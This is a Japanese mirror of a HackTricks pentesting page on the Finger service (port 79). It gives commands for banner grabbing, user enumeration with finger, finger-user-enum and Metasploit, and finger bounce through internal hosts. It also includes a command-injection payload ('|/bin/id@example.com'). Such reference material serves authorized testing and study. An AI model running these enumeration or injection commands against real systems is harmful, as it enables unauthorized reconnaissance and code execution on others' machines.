mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
4.4 KiB
4.4 KiB
79 - Pentesting Finger
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい場合やHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションをご覧ください
- 💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦 @carlospolopmをフォローしてください。
- HackTricksのGitHubリポジトリやHackTricks CloudにPRを提出して、あなたのハッキングテクニックを共有してください。
基本情報
Fingerは、コンピュータユーザーに関する情報を見つけるために使用できるプログラムです。通常、ログイン名、フルネーム、およびfingeringしているユーザーに関する他の詳細をリストします。これらの詳細には、オフィスの場所や電話番号(既知の場合)、ログイン時間、アイドル時間、最後にメールを読んだ時間、ユーザーのプランとプロジェクトファイルが含まれる場合があります。
デフォルトポート: 79
PORT STATE SERVICE
79/tcp open finger
列挙
バナー掴み取り/基本接続
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
ユーザー列挙
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
代わりに、pentestmonkey から finger-user-enum を使用することもできます。いくつかの例:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmapはデフォルトスクリプトを使用してスクリプトを実行します
MetasploitはNmapよりも多くのトリックを使用します
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
コマンド実行
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
finger user@host@victim
finger @internal@external
AWSハッキングをゼロからヒーローまで学ぶ htARTE (HackTricks AWS Red Team Expert)!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい場合、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループに参加するか、テレグラムグループに参加する、またはTwitter 🐦 @carlospolopmをフォローする。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。